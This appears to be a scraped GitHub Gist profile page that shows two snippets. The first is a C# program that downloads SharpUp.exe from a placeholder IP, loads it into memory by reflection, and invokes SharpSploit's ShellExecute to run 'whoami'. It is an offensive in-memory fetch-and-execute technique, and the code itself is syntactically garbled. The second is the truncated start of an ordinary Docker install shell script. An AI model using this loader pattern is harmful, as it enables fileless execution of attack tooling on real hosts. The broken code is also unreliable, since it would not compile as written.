Skip to content

Instantly share code, notes, and snippets.

View network23's full-sized avatar

23 network23

  • ☆✲゚。.(✿◕ ‿◕ฺ)ノ))☆.。₀:゚✲゚:₀。
View GitHub Profile
public class Program {
public static void Main() {
System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData("https://x.x.x.x/SharpUp.exe")).EntryPoint.Invoke(null, parameters);")).GetType("SharpSploit.Execution.Shell").GetMethod("ShellExecute").Invoke(0, @("whoami", "", "", ""));
}
}
# object[] arguments = new object[]{ new string[] {"arg1", "arg2"}};
#!/bin/bash
# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update
# remove previously installed Docker
sudo apt-get remove docker docker-engine docker.io* lxc-docker*
# install dependencies 4 cert